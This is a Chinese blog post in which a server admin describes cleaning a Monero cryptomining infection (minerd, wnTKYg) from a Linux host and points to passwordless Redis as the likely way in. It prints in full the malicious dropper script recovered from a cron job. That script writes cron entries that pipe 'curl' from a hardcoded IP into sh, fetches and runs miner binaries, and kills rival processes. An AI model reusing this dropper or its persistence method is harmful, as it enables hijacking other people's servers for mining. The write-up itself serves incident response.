minerd和wnTKYg程序(病毒)--被攻擊CPU佔用率達到100%
阿新 • • 發佈:2019-01-29
今天登入伺服器感覺伺服器特別的慢。結果檢視發現有兩個程序佔用CPU100%了,一個是minerd一個是wnTKYg。如果大家遇到請小心。
- 檢視伺服器各個程式佔用資源量
[root@iZ2zeayj54m6qs0689jm ~]# top
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1331 root 20 0 233m 5392 1076 S 99.8 0.1 58 :24.44 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8
1406 root 20 0 223m 5032 704 S 98.8 0.1 54:42.39 /tmp/wnTKYg
#在顯示的時候按c鍵出現程式的路徑
或者按以下方式找出佔用記憶體大的程式路徑
[root@iZ2zeayj54m6qs0689jm ~]# ps -ef | grep minerd
root 1331 1 99 12:46 ? 00:59:48 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr .crypto-pool.fr:8080 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
root 2526 1339 0 13:46 pts/0 00:00:00 grep minerd
[root@iZ2zeayj54m6qs0689jm ~]# ps -ef | grep wnTKYg
root 1406 1 98 12:50 ? 00:56:50 /tmp/wnTKYg
root 2538 1339 0 13:47 pts/0 00:00:00 grep wnTKYg
- 殺死佔用記憶體大的程式
[root@iZ2zeayj54m6qs0689jm opt]# kill -9 1406
[root@iZ2zeayj54m6qs0689jm opt]# kill -9 1331
- 然後根據檢視到的程式路徑,進入目錄內,將目錄裡的檔案刪除
[root@iZ2zeayj54m6qs0689jm ~]# cd /tmp/
[root@iZ2zeayj54m6qs0689jm tmp]# ls
Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> duckduckgo.23.log hsperfdata_root wnTKYg
ddg.1001 dump.rdb qtsingleapp-aegisG-46d2
[root@iZ2zeayj54m6qs0689jm tmp]# rm -rf ./*
[root@iZ2zeayj54m6qs0689jm tmp]# cd /opt/
KHK75NEOiq33 minerd rh/
[root@iZ2zeayj54m6qs0689jm tmp]# cd /opt/
[root@iZ2zeayj54m6qs0689jm opt]# ls
KHK75NEOiq33 minerd rh
[root@iZ2zeayj54m6qs0689jm opt]# rm -rf ./*
- 之後檢查開機自動啟動或者定時任務裡是否有不正常自啟動和定時任務
我中的病毒是寫在定時任務的一個任務。指向一個網站自動下載一個指令碼。我下下來看了下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?8 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?8 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.1001" ]; then
curl -fsSL http://104.131.145.109/1001/ddg.$(uname -m) -o /tmp/ddg.1001
fi
chmod +x /tmp/ddg.1001 && /tmp/ddg.1001
CleanTail()
{
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
DoTKY()
{
if [ ! -f "/tmp/wnTKYg" ]; then
curl -fsSL http://104.131.145.109/wnTKYg -o /tmp/wnTKYg
fi
chmod +x /tmp/wnTKYg
/tmp/wnTKYg
}
DoTKYnoAES()
{
if [ ! -f "/tmp/wnTKYg.noaes" ]; then
curl -fsSL http://104.131.145.109/wnTKYg.noaes -o /tmp/wnTKYg.noaes
fi
chmod +x /tmp/wnTKYg.noaes
/tmp/wnTKYg.noaes
}
ps auxf|grep -v grep|grep "AnXqV"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" || DoTKY
ps auxf|grep -v grep|grep "wnTKYg" || DoTKYnoAES
指令碼是這樣的,相信大家也都看懂啦。
top等待檢視,看是否還會啟動程式。(我的也啟動了)如果啟動了,檢查剛才的步驟是不是沒做,如果都做了,就再次殺掉程式就好了。我的是一直沒發現問題。
問題總結
這樣的病毒是直接遠端連線redis,一般redis都是root安裝的,連線redis也就掌握了root許可權,它可以往你的定時任務裡寫內容。
- 中這樣的病毒大多都是因為redis沒有設定密碼,存在著很大的安全漏洞,所以大家要設定redis密碼,並且更改redis的埠。安裝時最好別用root安裝。(後續會更新redis設定密碼,和連線java)
- 查了些資料看有人說這是在挖幣,wnTKYg是門羅幣,所以大家要注意伺服器的安全,別讓自己的資源讓別人用來掙錢。 -